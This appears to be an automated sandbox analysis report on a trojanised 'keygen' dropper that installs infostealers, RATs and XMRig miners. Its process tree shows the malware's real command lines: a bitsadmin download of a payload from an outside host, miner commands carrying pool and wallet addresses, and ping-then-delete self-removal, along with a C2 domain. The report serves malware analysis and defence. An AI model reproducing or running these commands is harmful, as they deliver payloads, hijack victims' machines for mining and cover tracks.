Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    188s
  • max time network
    282s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 18:20

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 51 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:60
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1468
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1392
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2688
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2936
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2696
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2532
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2484
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1884
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1224
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1104
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1028
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:784
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2600
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2852
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1832
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2464
                        • C:\Users\Admin\AppData\Local\Temp\is-DC07I.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-DC07I.tmp\Install.tmp" /SL5="$5007E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1200
                          • C:\Users\Admin\AppData\Local\Temp\is-MNKPU.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-MNKPU.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2316
                            • C:\Program Files\Reference Assemblies\AIISQTJARO\ultramediaburner.exe
                              "C:\Program Files\Reference Assemblies\AIISQTJARO\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3152
                              • C:\Users\Admin\AppData\Local\Temp\is-IPJ2O.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-IPJ2O.tmp\ultramediaburner.tmp" /SL5="$501E4,281924,62464,C:\Program Files\Reference Assemblies\AIISQTJARO\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:2560
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2564
                            • C:\Users\Admin\AppData\Local\Temp\13-75da7-57d-d6fbb-ea718c19b5538\Torekywose.exe
                              "C:\Users\Admin\AppData\Local\Temp\13-75da7-57d-d6fbb-ea718c19b5538\Torekywose.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2272
                            • C:\Users\Admin\AppData\Local\Temp\1f-db415-6d3-dbe80-276a41928b606\Lokaehydibu.exe
                              "C:\Users\Admin\AppData\Local\Temp\1f-db415-6d3-dbe80-276a41928b606\Lokaehydibu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1492
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ashn5l13.3ju\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4820
                                • C:\Users\Admin\AppData\Local\Temp\ashn5l13.3ju\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\ashn5l13.3ju\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5052
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pn2smtcg.kfr\md1_1eaf.exe & exit
                                6⤵
                                  PID:4744
                                  • C:\Users\Admin\AppData\Local\Temp\pn2smtcg.kfr\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\pn2smtcg.kfr\md1_1eaf.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:4988
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dj0lbhhj.cav\google-game.exe & exit
                                  6⤵
                                    PID:4700
                                    • C:\Users\Admin\AppData\Local\Temp\dj0lbhhj.cav\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\dj0lbhhj.cav\google-game.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4660
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        8⤵
                                        • Loads dropped DLL
                                        PID:5300
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vtyjdwf0.4pt\y1.exe & exit
                                    6⤵
                                      PID:4852
                                      • C:\Users\Admin\AppData\Local\Temp\vtyjdwf0.4pt\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\vtyjdwf0.4pt\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:5644
                                        • C:\Users\Admin\AppData\Local\Temp\JFuWNlGR5x.exe
                                          "C:\Users\Admin\AppData\Local\Temp\JFuWNlGR5x.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5636
                                          • C:\Users\Admin\AppData\Roaming\1619209513610.exe
                                            "C:\Users\Admin\AppData\Roaming\1619209513610.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619209513610.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:2724
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\JFuWNlGR5x.exe"
                                            9⤵
                                              PID:5976
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:708
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vtyjdwf0.4pt\y1.exe"
                                            8⤵
                                              PID:4544
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:512
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0kmiody.atk\inst.exe & exit
                                          6⤵
                                            PID:5332
                                            • C:\Users\Admin\AppData\Local\Temp\f0kmiody.atk\inst.exe
                                              C:\Users\Admin\AppData\Local\Temp\f0kmiody.atk\inst.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5972
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xmtv2mkn.2ch\SunLabsPlayer.exe /S & exit
                                            6⤵
                                              PID:4200
                                              • C:\Users\Admin\AppData\Local\Temp\xmtv2mkn.2ch\SunLabsPlayer.exe
                                                C:\Users\Admin\AppData\Local\Temp\xmtv2mkn.2ch\SunLabsPlayer.exe /S
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                PID:5624
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:5996
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:5804
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5124
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5192
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5944
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:4544
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Checks for any installed AV software in registry
                                                              PID:4852
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:4440
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pmmxF8bmyU8wzHT7 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:6000
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5152
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5380
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5236
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5420
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4872
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6036
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\aGDncOmoe\aGDncOmoe.dll" aGDncOmoe
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        PID:5328
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\aGDncOmoe\aGDncOmoe.dll" aGDncOmoe
                                                                          9⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in System32 directory
                                                                          • Drops file in Program Files directory
                                                                          PID:4008
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Blocklisted process makes network request
                                                                        • Executes dropped EXE
                                                                        PID:4460
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:3316
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4936
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5172
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                9⤵
                                                                                  PID:6036
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFD92.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5108
                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                  8⤵
                                                                                    PID:4688
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tfc3btwn.ej0\GcleanerWW.exe /mixone & exit
                                                                                6⤵
                                                                                  PID:5088
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n4etrdh0.0ya\toolspab1.exe & exit
                                                                                  6⤵
                                                                                    PID:4800
                                                                                    • C:\Users\Admin\AppData\Local\Temp\n4etrdh0.0ya\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\n4etrdh0.0ya\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4376
                                                                                      • C:\Users\Admin\AppData\Local\Temp\n4etrdh0.0ya\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\n4etrdh0.0ya\toolspab1.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5308
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lvpe4imb.23u\c7ae36fa.exe & exit
                                                                                    6⤵
                                                                                      PID:4864
                                                                                      • C:\Users\Admin\AppData\Local\Temp\lvpe4imb.23u\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\lvpe4imb.23u\c7ae36fa.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5960
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0reiy1g.rlb\app.exe /8-2222 & exit
                                                                                      6⤵
                                                                                        PID:5732
                                                                                        • C:\Users\Admin\AppData\Local\Temp\i0reiy1g.rlb\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\i0reiy1g.rlb\app.exe /8-2222
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5480
                                                                                          • C:\Users\Admin\AppData\Local\Temp\i0reiy1g.rlb\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\i0reiy1g.rlb\app.exe" /8-2222
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:5268
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies system certificate store
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4180
                                                                                • C:\Users\Admin\AppData\Roaming\A09B.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\A09B.tmp.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4992
                                                                                  • C:\Users\Admin\AppData\Roaming\A09B.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\A09B.tmp.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks processor information in registry
                                                                                    PID:2464
                                                                                • C:\Users\Admin\AppData\Roaming\A4D2.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\A4D2.tmp.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4672
                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w15751@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                    4⤵
                                                                                      PID:4632
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w6934 --cpu-max-threads-hint 50 -r 9999
                                                                                      4⤵
                                                                                      • Blocklisted process makes network request
                                                                                      PID:2192
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    3⤵
                                                                                      PID:3872
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping 127.0.0.1
                                                                                        4⤵
                                                                                        • Runs ping.exe
                                                                                        PID:4804
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:5316
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    PID:5076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4904
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                  1⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4076
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Checks processor information in registry
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:2084
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4608
                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  PID:4912
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4356
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  PID:3936
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
